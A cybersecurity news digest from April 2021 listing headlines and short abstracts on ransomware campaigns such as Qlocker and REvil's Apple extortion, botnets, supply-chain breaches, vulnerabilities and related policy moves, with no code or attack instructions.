Washington is ramping up efforts to rein in the market power of the largest tech companies in the United States, and some members of Congress and some of President Biden's nominees are set to play a big role. Meanwhile, Congress is also examining the impact of social media platforms’ algorithms, and executives from Facebook, Twitter and YouTube are set to testify at a Senate hearing next week. (The Hill)
April 23, 2021 – Policy and Law
Californian Charged with Cyberstalking Teenage Boys
Abstract
Brentwood woman allegedly bombarded three boys with abusive messages for years. (Infosecurity Magazine)
April 23, 2021 – Government
The Biden Administration’s Impending Executive Order on Software Security
Abstract
Executive branch action on software security is sorely needed, but should focus primarily on risk management rather than merely new reporting requirements. (Lawfare)
April 23, 2021 – Ransomware
New Qlocker ransomware infected hundreds of QNAP NAS devices in a few days
Abstract
A new ransomware strain dubbed Qlocker is infecting hundreds of QNAP NAS devices every day and demanding a $550 ransom payment. Experts are warning of a new strain of ransomware named Qlocker that is infecting hundreds of QNAP NAS devices on a daily... (Security Affairs)
April 23, 2021 – Government
Following similar move in US, Europol prepares coup de grâce for Emotet’s remains
Abstract
Emotet’s final undoing comes two weeks after a similar FBI operation sent a kill command to hundreds of Microsoft Exchange servers, ordering web shells to delete themselves. But there are differences in subtlety and scope. (SCMagazine)
April 23, 2021 – Hacker
Oscar-Bait, Literally: Hackers Abuse Nominated Films for Phishing, Malware
Abstract
Judas and the Black Messiah may be a favorite for Best Picture at the 93rd Academy Awards on Sunday, but it’s a fave for cybercriminals too. (Threatpost)
April 23, 2021 – Attack
Passwordstate password manager hacked in supply chain attack
Abstract
Click Studios, the company behind the Passwordstate password manager, notified customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. (BleepingComputer)
April 23, 2021 – Botnet
New Golang-based Sysrv Cryptomining Botnet Targets Popular Enterprise Applications
Abstract
As analyzed in reports from security researchers at Alibaba’s Aliyun, Juniper, and Lacework, Sysrv’s internal architecture follows the classic makeup of 99% of botnets today. (The Record)
April 23, 2021 – Policy and Law
Senators introduce legislation to protect critical infrastructure against attack
Abstract
Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. (The Hill)
April 23, 2021 – General
US Cyber Games Launches Cyber Open and Combine
Abstract
America begins nationwide search for cybersecurity’s most talented. (Infosecurity Magazine)
April 23, 2021 – Business
50 companies named trusted providers by Cloud Security Alliance
Abstract
The Cloud Security Alliance (CSA) on Thursday announced the selection of a first round of “trusted providers” for cloud security. In a press announcement, the group said a Trusted Cloud Provider “trustmark” will get displayed on each organization’s CSA Security, Trust, Assurance & Risk (STAR) registry. The CSA hopes this will assist security teams in… (SCMagazine)
April 23, 2021 – Phishing
Phishing impersonates global recruitment firm to push malware
Abstract
An ongoing phishing campaign is impersonating Michael Page consultants to push Ursnif data-stealing malware capable of harvesting credentials and sensitive data from infected computers. (BleepingComputer)
April 23, 2021 – Criminals
US: Ireland Is a Target for Cyber-Criminals
Abstract
Vast amount of data stored on Emerald Isle a lure for cyber-criminals, warns America’s National Security Division. (Infosecurity Magazine)
April 23, 2021 – Attack
Researchers say enterprise password manager hit in supply chain attack
Abstract
In an April 23 blog, the firm said they have digital evidence that Australian company ClickStudios suffered a breach, sometime between April 20 and April 22, that resulted in the attacker dropping a corrupted update to their password manager Passwordstate via a zip file containing a dynamic link library with malicious code. (SCMagazine)
April 23, 2021 – Government
GCHQ Director: The UK and Allies Must Counter “Existential Threat” to the Digital Environment
Abstract
The UK must react to China's attempts to control the global operating system. (Infosecurity Magazine)
April 23, 2021 – Ransomware
Ransomware gang offers traders inside scoop on attack victims so they can short sell their stocks
Abstract
The latest fallout of ransomware attacks may involve stock manipulation, with one group openly coaxing stock traders to reach out and receive the inside scoop on the gang’s latest corporate victims, so they can short sell their stock before data is leaked and the news goes public. (SCMagazine)
April 23, 2021 – Vulnerabilities
New Supply Chain Exploit in CocoaPods Impacts Three Million Mobile Apps
Abstract
A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open source package manager. (The Daily Swig)
April 23, 2021 – Vulnerabilities
New QNAP NAS Flaws Exploited In Recent Ransomware Attacks - Patch It!
Abstract
A new ransomware strain called "Qlocker" is targeting QNAP network attached storage (NAS) devices as part of an ongoing campaign and encrypting files in password-protected 7zip archives. First reports of the infections emerged on April 20, with the adversaries behind the operations demanding a bitcoin payment (0.01 bitcoins or about $500.57) to receive the decryption key. In response to the ongoing attacks, the Taiwanese company has released an advisory prompting users to apply updates to QNAP NAS running Multimedia Console, Media Streaming Add-on, and HBS 3 Hybrid Backup Sync to secure the devices from any attacks. "QNAP strongly urges that all users immediately install the latest Malware Remover version and run a malware scan on QNAP NAS," the company said. "The Multimedia Console, Media Streaming Add-on, and Hybrid Backup Sync apps need to be updated to the latest available version as well to further secure QNAP NAS from ransomware attacks." (The Hacker News)
April 23, 2021 – Botnet
Last Chance for Forensics Teams Ahead of Emotet Sunday Deadline
Abstract
Notorious botnet will be removed from global machines at the weekend. (Infosecurity Magazine)
April 23, 2021 – Privacy
A Multilateral Surveillance Accord: Setting the Table
Abstract
Stakeholders are increasingly advocating for a multilateral accord on government surveillance. (Lawfare)
April 23, 2021 – Ransomware
Million-dollar deposits and friends in high places: how we applied for a job with a ransomware gang
Abstract
In June 2020, a user called ‘Unknown’ submitted a rather peculiar post on a popular Russian hacker forum, looking for people to join their ‘affiliate program’ which was believed to be from REvil. (Security Affairs)
April 23, 2021 – Botnet
Tor-Based Botnet Malware Targets Linux Systems, Abuses Cloud Management Tools
Abstract
As Linux attracts more attention from malicious actors, researchers have seen threats evolving — abusing services like Ngrok and using functions to hunt and kill other competing malware. (Trend Micro)
April 23, 2021 – Ransomware
Darkside Ransomware Gang Plans to Extort NASDAQ-listed Victims by Shorting Their Stock Prices
Abstract
The operators of the Darkside ransomware are expanding their extortion tactics with a new technique aimed at companies that are listed on NASDAQ or other stock markets globally. (The Record)
April 23, 2021 – Government
CISA Warns of ICS Vulnerabilities in Horner Automation Cscape and Mitsubishi Electric GOT
Abstract
The DHS's Cybersecurity and Infrastructure Security Agency (CISA) today issued ICS advisories for vulnerabilities in the Horner Automation Cscape software and the Mitsubishi Electric GOT. (Dark Reading)
April 23, 2021 – Phishing
Another BitCoin Exchange Scam—This Time “Live” on YouTube
Abstract
Essentially, this is a typical scam, much like the recent Bitcoin exchange scams seen on Twitter. But this is a first for the YouTube platform. And it also made the claim that it was LIVE. (Fortinet)
April 23, 2021 – Ransomware
Stanford student finds glitch in ransomware payment system to save victims $27,000
Abstract
The hackers behind a nascent strain of ransomware hit a snag this week when a security researcher found a flaw in the payment system and, he says, helped victims save $27,000 in potential losses. (Cyberscoop)
April 23, 2021 – Breach
Lockdown Hotel Bookings at Risk Due to DMARC Fail
Abstract
Proofpoint claims half of UK hotels not using anti-phishing protocol. (Infosecurity Magazine)
April 23, 2021 – Malware
TLS-Encrypted Malware Volumes Double in Just Months
Abstract
Sophos warns of increasing use of legitimate web services to hide malware. (Infosecurity Magazine)
April 23, 2021 – General
SolarWinds hack analysis reveals 56% boost in command server footprint
Abstract
On Thursday, RiskIQ researchers published a report on the network infrastructure footprint of SolarWinds-linked cyberattackers, labeling it as "significantly larger than previously identified." (ZDNet)
April 23, 2021 – Vulnerabilities
Signal Says Cellebrite Mobile Device Analysis Products Can Be Hacked
Abstract
Cellebrite’s forensic applications do not include the type of security protections one would expect from parsing software, which renders them susceptible to attacks, according to Signal. (Security Week)
April 23, 2021 – Phishing
Analysis of New FormBook Variant Delivered in Phishing Campaign
Abstract
FormBook is a malware designed to steal sensitive information from a victim’s device as well as to receive control commands to perform additional malicious tasks on that device. (Fortinet)
April 23, 2021 – Attack
Evil Maid Attack – Vacuum Hack
Abstract
Evil Maid Attack - Weaponizing a harmless vacuum cleaner by hiding within it a small rogue device such as a Raspberry Pi. It is a typical day at the office. You are sitting at your desk, working hard at whatever it is that you do. The cleaning lady... (Security Affairs)
April 23, 2021 – Botnet
Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers
Abstract
Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines into a cryptocurrency botnet named Prometei, according to new research. "Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more," Boston-based cybersecurity firm Cybereason said in an analysis summarizing its findings. First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and "increase the amount of systems participating in its Monero-mining pool." "Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted in... (The Hacker News)
April 23, 2021 – Ransomware
Darkside Ransomware gang aims at influencing the stock price of their victims
Abstract
The Darkside ransomware gang is enhancing its extortion tactics to interfere with the valuation of stocks of companies that are listed on NASDAQ or other stock markets. The Darkside ransomware operators are stepping up their extortion tactics targeting... (Security Affairs)
April 23, 2021 – Accident
Twitter accidentally sends suspicious emails asking to confirm accounts
Abstract
Twitter caused quite the panic Thursday night when they accidentally sent emails asking users to confirm their accounts, which looked suspiciously like a phishing attack. (BleepingComputer)
April 23, 2021 – Accident
Twitter accidentally sends suspicious emails asking to confirm accounts Full Text
Abstract
Twitter caused quite the panic Thursday night when they accidentally sent emails asking users to confirm their accounts, which looked suspiciously like a phishing attack.BleepingComputer
April 22, 2021 – Business
KnowBe4 CEO Stu Sjouwerman talks IPO, and ‘strengthening that human firewall’
Abstract
SC Media caught up with CEO and founder Stu Sjouwerman on the company’s plans to expand international sales and leverage automation and machine learning to further explore the human layer of cybersecurity. (SCMagazine)
April 22, 2021 – General
Hillicon Valley: Acting FTC chair blasts Supreme Court decision limiting agency consumer power | Police tech under scrutiny following Chicago shooting
Abstract
The chair of the Federal Trade Commission criticized a Supreme Court decision handed down Thursday that limits how the agency can punish companies engaging in deceptive practices. Meanwhile, certain kinds of technologies used by law enforcement have come under scrutiny following the shooting of 13-year-old Adam Toledo in Chicago, and two Senate Democrats are raising concerns around the safety and security of Tesla vehicles. (The Hill)
April 22, 2021 – General
Vendors are getting better at spotting malicious execution techniques
Abstract
Cybersecurity enterprise solutions are getting better at recognizing malicious activity conducted via APIs and Windows Management Instrumentation tools. (SCMagazine)
April 22, 2021 – Malware
Malware operators leverage TLS in 46% of detected communications
Abstract
Malware operators have also been adopting TLS for essentially the same reasons as legitimate companies: to prevent defenders from detecting and stopping the deployment of malware and data theft. (SCMagazine)
April 22, 2021 – Government
New chief of Carnegie Mellon’s CERT: Feds need to do better with info sharing
Abstract
Rather than limit focus to indicators of compromise, CERT’s new director, Greg Touhill, said government needs “to do a better job of making sure that what information we share has contextual elements, and is timely.” (SCMagazine)
April 22, 2021 – Botnet
Botnet backdoors Microsoft Exchange servers, mines cryptocurrency
Abstract
Unpatched Microsoft Exchange servers are being targeted by the Prometei botnet and added to its operators' army of Monero (XMR) cryptocurrency mining bots. (BleepingComputer)
April 22, 2021 – Ransomware
Mount Locker Ransomware Aggressively Changes Up Tactics
Abstract
The ransomware is upping its danger quotient with new features while signaling a rebranding to “AstroLocker.” (Threatpost)
April 22, 2021 – Criminals
Spotlight on the Cybercriminal Supply Chains
Abstract
In this Threatpost podcast, Fortinet’s top researcher outlines what a cybercriminal supply chain is and how much the illicit market is worth. (Threatpost)
April 22, 2021 – Phishing
FlixOnline Poses as Netflix to Steal WhatsApp Conversations Data
Abstract
New research unveiled an Android malware, disguised as an app called FlixOnline, that entices users by promising free Netflix subscriptions and spreads further by creating auto-replies to messages in WhatsApp. (Cyware Alerts - Hacker News)
April 22, 2021 – Phishing
Cybercriminals use Telegram Bots and Google Forms for Automated Phishing
Abstract
Group-IB found that cybercriminals are frequently using legitimate services including Google Forms and Telegram bots to collect stolen data from exploit kits during phishing attacks. (Cyware Alerts - Hacker News)
April 22, 2021 – Vulnerabilities
Trend Micro flaw actively exploited in the wild
Abstract
The issue resides in the logic that controls access to the Misc folder; it could be exploited by an attacker to escalate privileges and execute code in the context of SYSTEM. (Security Affairs)
April 22, 2021 – Criminals
Way Too Many Cybercriminal Groups Active Presently
Abstract
A new report disclosed that, with more than 1,900 hacker groups active, including APTs, the current cybercrime landscape is witnessing a rise in new malware variants that are being deployed in the wild. (Cyware Alerts - Hacker News)
April 22, 2021 – Phishing
Costco Issues Scam Warning
Abstract
Membership-only big-box wholesaler tells Americans to be wary of 14 digital scams. (Infosecurity Magazine)
April 22, 2021 – Vulnerabilities
Rockwell Industrial Switches Affected by More Vulnerabilities in Cisco Software
Abstract
Rockwell Automation has started releasing firmware updates for some of its Stratix switches to address another round of vulnerabilities introduced by the use of Cisco’s IOS XE software. (Security Week)
April 22, 2021 – Policy and Law
Google Ordered to Provide Info on Alleged Cyber-bullies
Abstract
Canadian court orders tech giant to reveal who is behind blog dishing out alleged online harassment. (Infosecurity Magazine)
April 22, 2021 – Privacy
Privacy and security in software design
Abstract
The importance of carrying out a careful risk and impact assessment in order to safeguard the security of information and data privacy. In order to reduce as much as possible the vulnerabilities and programming errors that can affect not only... (Security Affairs)
April 22, 2021 – Malware
Telegram Platform Abused in ‘ToxicEye’ Malware Campaigns
Abstract
Even if the app is not installed or in use, threat actors can use it to spread malware through email campaigns and take over victims’ machines, new research has found. (Threatpost)
April 22, 2021 – Vulnerabilities
Cellebrite’s forensics tool affected by arbitrary code execution issue
Abstract
Cellebrite's mobile forensics tool UFED contains multiple flaws that allow arbitrary code execution on the device, Signal's creator warns. Moxie Marlinspike, the creator of the popular encrypted messaging app Signal, announced that Cellebrite mobile forensics... (Security Affairs)
April 22, 2021 – Outage
Exchange Online down: Microsoft 365 outage affects email delivery
Abstract
A Microsoft 365 outage is preventing Exchange Online users from sending and receiving emails, with messages being stuck in transit and not reaching the recipients' inboxes. (BleepingComputer)
April 22, 2021 – Vulnerabilities
Researchers Discover Ways to Leak Contact Information by Exploiting Privacy Weaknesses in Apple AirDrop
Abstract
A bug-hunting team at Technische Universität Darmstadt in Germany reverse engineered AirDrop and found that senders and receivers may leak their contact details in the process. (The Register)
April 22, 2021 – General
INTERPOL to Work with The Coalition Against Stalkerware to Tackle Surge in Domestic Violence
Abstract
INTERPOL will work with the coalition to improve the abilities of police forces to tackle this growing issue. (Infosecurity Magazine)
April 22, 2021 – Vulnerabilities
QNAP removes backdoor account in NAS backup, disaster recovery app
Abstract
QNAP has addressed a critical vulnerability allowing attackers to log into QNAP NAS (network-attached storage) devices using hardcoded credentials. (BleepingComputer)
April 22, 2021 – Botnet
Massive Android Botnet Uses Spoofed Apps to Serve Hundreds of Millions of Fraud Ad Requests on Smart TVs
Abstract
The sophisticated mobile botnet, dubbed Pareto, is made up of nearly a million infected mobile Android devices pretending to be millions of people watching ads on smart TVs and other devices. (Security Week)
April 22, 2021 – Hacker
Researchers Find Additional Infrastructure Used By SolarWinds Hackers
Abstract
The sprawling SolarWinds cyberattack which came to light last December was known for its sophistication in the breadth of tactics used to infiltrate and persist in the target infrastructure, so much so that Microsoft went on to call the threat actor behind the campaign "skillful and methodic operators who follow operations security (OpSec) best practices to minimize traces, stay under the radar, and avoid detection." But new research published today shows that the threat actor carefully planned each stage of the operation to "avoid creating the type of patterns that make tracking them simple," thus deliberately making forensic analysis difficult. By analyzing telemetry data associated with previously published indicators of compromise, RiskIQ said it identified an additional set of 18 servers with high confidence that likely communicated with the targeted, secondary Cobalt Strike payloads delivered via the TEARDROP and RAINDROP malware, representing a 56% jum... (The Hacker News)
April 22, 2021 – Ransomware
DoJ Launches Ransomware Taskforce as Apple Hit by Extortion Attempt
Abstract
REvil group claims to have secret Macbook plans stolen from supplier. (Infosecurity Magazine)
April 22, 2021 – Botnet
Pareto Botnet, million infected Android devices conduct fraud in the CTV ad ecosystem
Abstract
Researchers from Human Security have uncovered a huge botnet of Android devices being used to conduct fraud in the connected TV advertising ecosystem. Security researchers at Human Security (formerly White Ops) discovered a massive Android botnet,... (Security Affairs)
April 22, 2021 – General
It’s Easy to Become a Cyberattack Target, but a VPN Can Help
Abstract
You might think that cybercrime is more prevalent in less digitally literate countries. However, NordVPN’s Cyber Risk Index puts North American and Northern European countries at the top of the target list. (Threatpost)
April 22, 2021 – Malware
Attackers can hide ‘external sender’ email warnings with HTML and CSS
Abstract
The "external sender" warnings shown to email recipients by clients like Microsoft Outlook can be hidden by the sender, as demonstrated by a researcher. It turns out that all it takes for attackers to alter the "external sender" warning, or remove it altogether from emails, is just a few lines of HTML and CSS code. (BleepingComputer)
April 22, 2021 – IOT
FIDO launches protocol to secure IoT onboarding to cloud and on-premise management platforms
Abstract
The FIDO Alliance announced the launch of the FIDO Device Onboard protocol, a new, open IoT standard that will enable devices to simply and securely onboard to cloud and on-premise management platforms. (Help Net Security)
April 22, 2021 – General
Cost of Account Unlocks, and Password Resets Add Up
Abstract
There are many labor-intensive tasks that the IT service desk carries out on a daily basis. None is as tedious and costly as resetting passwords. Modern IT service desks spend a significant amount of time both unlocking and resetting passwords for end-users. This issue has been exacerbated by the COVID-19 pandemic. Causes of account lockouts and password resets: End-user password policies, such as those found in Microsoft Active Directory Domain Services (ADDS), typically define a password age. The password age is the length of time an end-user can keep their current password. While new guidance from NIST recommends against the long-held notion of forced password changes, it is still a common and required security mechanism across other compliance standards and industry certifications such as PCI and HITRUST. When the password age is reached for the user account, the user must change their account password. It is generally prompted at the next login on their workstation. This sce... (The Hacker News)
April 22, 2021 – Business
Security Biz Launches RDP Breach Notification Site
Abstract
Advanced Intelligence will check to see if your assets are on dark web site. (Infosecurity Magazine)
April 22, 2021 – Vulnerabilities
Trend Micro flaw actively exploited in the wild
Abstract
Cybersecurity firm Trend Micro revealed that a threat actor is actively exploiting a flaw, tracked as CVE-2020-24557, in its antivirus solutions to gain admin rights on Windows systems. Security solutions once again are used as attack vectors by threat... (Security Affairs)
April 22, 2021 – Vulnerabilities
Valve belatedly fixes Steam gaming platform RCE vulnerability
Abstract
A Steam Source engine vulnerability discovered by ‘Florian’, a member of reverse engineering group Secret Club, was finally resolved last weekend, after it was first reported in May 2019. (The Daily Swig)
April 22, 2021 – Criminals
Cybercriminals Using Telegram Messenger to Control ToxicEye Malware
Abstract
Adversaries are increasingly abusing Telegram as a "command-and-control" system to distribute malware into organizations that could then be used to capture sensitive information from targeted systems. "Even when Telegram is not installed or being used, the system allows hackers to send malicious commands and operations remotely via the instant messaging app," said researchers from cybersecurity firm Check Point, who have identified no fewer than 130 attacks over the past three months that make use of a new multi-functional remote access trojan (RAT) called "ToxicEye." The use of Telegram for facilitating malicious activities is not new. In September 2019, an information stealer dubbed Masad Stealer was found to plunder information and cryptocurrency wallet data from infected computers using Telegram as an exfiltration channel. Then last year, Magecart groups embraced the same tactic to send stolen payment details from compromised websites back to... (The Hacker News)
April 22, 2021 – Botnet
Prometei Botnet Exploits Exchange Server Bugs to Grow
Abstract
Crypto-mining botnet has been around since 2016. (Infosecurity Magazine)
April 22, 2021 – Ransomware
Million-dollar deposits and friends in high places: how we applied for a job with a ransomware gang
Abstract
During an undercover interview, a CyberNews researcher tricked ransomware operators affiliated with Ragnar Locker into revealing their ransom payout structure, cash-out schemes, and target acquisition strategies. From a relatively rare threat just... (Security Affairs)
April 22, 2021 – Malware
Another Malware Made its Way in Google Play Store
Abstract
A new set of malicious Android apps out there are impersonating security scanner apps on the official Play Store to steal sensitive information or even take full control of users' devices. (Cyware Alerts - Hacker News)
April 22, 2021 – Ransomware
New US Justice Department Task Force Formed to Disrupt Ransomware Operations
Abstract
In an internal memo, the DoJ outlines the creation of a new initiative that will bring together current efforts in the federal government to "pursue and disrupt" ransomware operations. (ZDNet)
April 21, 2021 – Malware
Novel Email-Based Campaign Targets Bloomberg Clients with RATs
Abstract
Attacks dubbed ‘Fajan’ by researchers are specifically targeted and appear to be testing various threat techniques to find ones with the greatest impact. (Threatpost)
April 21, 2021 – Malware
Facebook Busts Palestinian Hackers’ Operation Spreading Mobile Spyware
Abstract
Facebook on Wednesday said it took steps to dismantle malicious activities perpetrated by two state-sponsored hacking groups operating out of Palestine that abused its platform to distribute malware. The social media giant attributed the attacks to a network connected to the Preventive Security Service (PSS), the security apparatus of the State of Palestine, and another threat actor known as Arid Viper (aka Desert Falcon and APT-C-23), the latter of which is alleged to be connected to the cyber arm of Hamas. The two digital espionage campaigns, active in 2019 and 2020, exploited a range of devices and platforms, such as Android, iOS, and Windows, with the PSS cluster primarily targeting domestic audiences in Palestine. The other set of attacks went after users in the Palestinian territories and Syria and, to a lesser extent, Turkey, Iraq, Lebanon, and Libya. Both groups appear to have leveraged the platform as a springboard to launch a variety of social engineering attacks in... (The Hacker News)
April 21, 2021 – Vulnerabilities
Signal CEO gives mobile-hacking firm a taste of being hacked Full Text
Abstract
Software developed by data extraction company Cellebrite contains vulnerabilities that allow arbitrary code execution on the device, claims Moxie Marlinspike, the creator of the encrypted messaging app Signal.BleepingComputer
April 21, 2021 – General
Hillicon Valley: Tech companies duke it out at Senate hearing | Seven House Republicans vow to reject donations from Big Tech Full Text
Abstract
It was a big day for Big Tech at the Capitol, with the Senate Judiciary antitrust subcommittee holding a hearing featuring Google and Apple executives to look at their app store market power. And a group of seven House Republicans pledged to reject donations from some of the top tech companies. Meanwhile, Senate Majority Leader Chuck Schumer led a bipartisan group of lawmakers in rolling out legislation to invest more than $100 billion in emerging technologies.The Hill
April 21, 2021 – Vulnerabilities
When unicorns trot too fast: Lessons from one startup’s bug bounty missteps Full Text
Abstract
Luta Security’s Katie Moussoris details Clubhouse vulnerabilities she disclosed, and how fast growing startups with good intentions sometimes drop the ball.SCMagazine
April 21, 2021 – Education
New certification program trains cyber pros in cloud, IoT and other emerging tech Full Text
Abstract
Training covers the cloud, IoT, AI and blockchain technology, and the cybersecurity implications of each.SCMagazine
April 21, 2021 – Malware
WhatsApp Pink malware spreads via group chat messages Full Text
Abstract
A WhatsApp malware dubbed WhatsApp Pink is able to automatically reply to victims' Signal, Telegram, Viber, and Skype messages. The counterfeit app has now been updated: its authors have implemented the ability to automatically respond...Security Affairs
April 21, 2021 – Hacker
REvil seeks to extort Apple and hits supplier with $50 million ransom Full Text
Abstract
REvil – which has been on a tear the past several weeks – wants Apple to pay an undisclosed ransom by May 1 to “buy back” 15 stolen schematics of unreleased MacBooks and gigabytes of personal data on several major Apple brands they obtained from Quanta.SCMagazine
April 21, 2021 – Hacker
Someone is using SonicWall’s email security tool to hack customers Full Text
Abstract
It’s the second time SonicWall has been hit with an attack leveraging previously unknown weaknesses in their security products this year.SCMagazine
April 21, 2021 – Government
Justice Department convenes task force to tackle wave of ransomware attacks Full Text
Abstract
The Justice Department this week convened a new task force to address the mounting ransomware cyberattacks on critical U.S. organizations, which have spiked during the COVID-19 pandemic.The Hill
April 21, 2021 – General
Stallone Classic a Password Favorite Full Text
Abstract
Boxing drama "Rocky" tops list of movie titles most often used in leaked passwordsInfosecurity Magazine
April 21, 2021 – General
We Could Use a Private-Sector-Oriented Cyber Leader Full Text
Abstract
All three of President Biden’s picks for the top cyber positions in his administration are excellent choices. It would have been better, however, if one of them had experience more rooted in the private sector.Lawfare
April 21, 2021 – General
QR Codes Offer Easy Cyberattack Avenues as Usage Spikes Full Text
Abstract
Usage is way up, but so are cyberattacks: Mobile phishing, malware, banking heists and more can come from just one wrong scan.Threatpost
April 21, 2021 – Breach
Data Breach at New England’s Largest Energy Provider Full Text
Abstract
Misconfigured data storage folders expose data of EversourceInfosecurity Magazine
April 21, 2021 – Ransomware
Massive QLocker ransomware attack uses 7zip to encrypt QNAP devices Full Text
Abstract
A massive ransomware campaign targeting QNAP devices worldwide is underway, and users are finding their files now stored in password-protected 7zip archives.BleepingComputer
April 21, 2021 – Government
Lawmakers reintroduce bill to invest billions in emerging technologies to compete with China Full Text
Abstract
Senate Majority Leader Chuck Schumer (D-N.Y.) led dozens of bipartisan House and Senate members on Wednesday in rolling out legislation that would invest over $100 billion in emerging technologies in an effort to put the U.S. on a level playing field with China.The Hill
April 21, 2021 – Malware
Linux bans University of Minnesota for committing malicious code Full Text
Abstract
Linux kernel project maintainers have imposed a ban on the University of Minnesota (UMN) from contributing to the open-source Linux project after a group of UMN researchers were caught submitting a series of malicious code commits, or patches that deliberately introduced security vulnerabilities in the official Linux project.BleepingComputer
April 21, 2021 – Vulnerabilities
Google fixes exploited Chrome zero-day dropped on Twitter last week Full Text
Abstract
Google has released Chrome 90.0.4430.85 to address an actively exploited zero-day and four other high severity security vulnerabilities impacting today's most popular web browser.BleepingComputer
April 21, 2021 – Business
TikTok Sued Over Use of Minors’ Data Full Text
Abstract
Claim filed against TikTok on behalf of millions of children in Europe and the UKInfosecurity Magazine
April 21, 2021 – Government
CISA orders federal orgs to mitigate Pulse Secure VPN bug by Friday Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a new emergency directive ordering federal agencies to mitigate an actively exploited vulnerability in Pulse Connect Secure (PCS) VPN appliances on their networks by Friday.BleepingComputer
April 21, 2021 – Government
Foreign Spies Target British Nationals With Fake Social Media Profiles Full Text
Abstract
At least 10,000 UK nationals have been approached by malicious individuals using fraudulent profiles on the professional networking site, the BBC reports, citing security agency MI5.Dark Reading
April 21, 2021 – Vulnerabilities
Pulse Secure Critical Zero-Day Security Bug Under Active Exploit Full Text
Abstract
CVE-2021-22893 allows remote code-execution (RCE) and is being used in the wild by nation-state cyberattackers to compromise VPN appliances in defense, finance and government orgs.Threatpost
April 21, 2021 – Hacker
Logins for 1.3 million Windows RDP servers collected from hacker market Full Text
Abstract
The login names and passwords for 1.3 million current and historically compromised Windows Remote Desktop servers have been leaked by UAS, the largest hacker marketplace for stolen RDP credentials.BleepingComputer
April 21, 2021 – Vulnerabilities
Google issues Chrome update patching seven security vulnerabilities Full Text
Abstract
Google released version 90.0.4430.85 of the Chrome browser for Windows, Mac, and Linux. The zero-day, which was assigned the identifier CVE-2021-21224, was described as a "type confusion in V8".ZDNet
April 21, 2021 – Ransomware
Hackers threaten to leak stolen Apple blueprints if $50 million ransom isn’t paid Full Text
Abstract
Prominent Apple supplier Quanta on Wednesday said it suffered a ransomware attack from the REvil ransomware group, which is now demanding the iPhone maker pay a ransom of $50 million to prevent leaking sensitive files on the dark web. In a post shared on its deep web "Happy Blog" portal, the threat actor said it came into possession of schematics of the U.S. company's products such as MacBooks and Apple Watch by infiltrating the network of the Taiwanese manufacturer, claiming it's making a ransom demand to Apple after Quanta expressed no interest in paying to recover the stolen blueprints. "Our team is negotiating the sale of large quantities of confidential drawings and gigabytes of personal data with several major brands," the REvil operators said. "We recommend that Apple buy back the available data by May 1." Since first detected in June 2019, REvil (aka Sodinokibi or Sodin) has emerged as one of the most prolific ransomware-as-a-servicThe Hacker News
April 21, 2021 – Business
Rapid7 Acquires Open Source Monitoring Platform Velociraptor Full Text
Abstract
The deal will allow Rapid7 to enhance its incident response capabilitiesInfosecurity Magazine
April 21, 2021 – Ransomware
REvil ransomware gang recommends that Apple buy back its data stolen in Quanta hack Full Text
Abstract
The REvil ransomware operators are attempting to blackmail Apple after allegedly stealing product blueprints of the IT giant from its business partner. The REvil ransomware gang is attempting to extort Apple ahead of the Apple Spring Loaded...Security Affairs
April 21, 2021 – General
Swiss Army Knife for Information Security: What Is Comprehensive Protection? Full Text
Abstract
The vendor develops its product line so that the tools do not just cover individual needs but complement each other. For example, SearchInform's concept is to control threats at all levels of the information network: from hardware and software to file systems and databases, from user actions on a PC to their activity on the Internet.Threatpost
April 21, 2021 – Malware
WhatsApp Pink malware can now auto-reply to your Signal, Telegram texts Full Text
Abstract
WhatsApp malware dubbed WhatsApp Pink has now been updated with advanced capabilities that let this counterfeit Android app automatically respond to your Signal, Telegram, Viber, and Skype messages. WhatsApp Pink refers to a counterfeit app that appeared this week, primarily targeting WhatsApp users in the Indian subcontinent.BleepingComputer
April 21, 2021 – Attack
Black Kingdom and Microsoft Exchange Attacks Full Text
Abstract
The patch for the ProxyLogon vulnerabilities was released more than a month ago, yet one more ransomware actor has joined the growing list of adversaries exploiting them.Cyware Alerts - Hacker News
April 21, 2021 – General
Improve Your Cyber Security Posture by Combining State of the Art Security Tools Full Text
Abstract
Today there are plenty of cybersecurity tools on the market. It is now more important than ever that the tools you decide to use work well together. If they don't, you will not get the complete picture, and you won't be able to analyze the entire system from a holistic perspective. This means that you won't be able to do the right mitigations to improve your security posture. Here are examples of two tools that work very well together and how they will help you to get a holistic view of your cybersecurity posture. Debricked - Use Open Source Securely How is Open Source a Security Risk? Open source is not a security risk per se; it's more secure than proprietary software in many ways! With the code being publicly available, it's a lot easier for the surrounding community to identify vulnerabilities, and fixes can be done quickly. What you do need to keep in mind, though, is that any vulnerabilities in open source are publicly disclosed and the public to anyoThe Hacker News
April 21, 2021 – Business
Facebook leaks strategy to numb reaction to data scraping incidents Full Text
Abstract
Facebook's long-term strategy is to desensitize users about leaked data dumps that were collected through scraping the public portion of the social network.BleepingComputer
April 21, 2021 – Ransomware
REvil Ransomware Gang Claims to Steal Confidential Designs of Apple Devices from Quanta Computer Full Text
Abstract
REvil said it is "negotiating the sale" of the trove "with several major brands" and is sitting on data describing Apple's Watch, MacBook Air, and MacBook Pro, plus the Lenovo ThinkPad Z60m.The Register
April 21, 2021 – Malware
FormBook: A Well-known Commercial Malware Learns New Tricks Full Text
Abstract
A phishing campaign is luring victims into viewing a video with details of brochures and prices for an old purchase order. The malware involved has made a comeback with a new obfuscation technique.Cyware Alerts - Hacker News
April 21, 2021 – Malware
Malvertising Operation Tag Barnakle Takes Over Unpatched Revive Servers to Show Malicious Ads Full Text
Abstract
A malvertising operation known under the codename of Tag Barnakle has breached more than 120 ad servers over the past year and inserted malicious code into legitimate ads to redirect website visitors.The Record
April 21, 2021 – APT
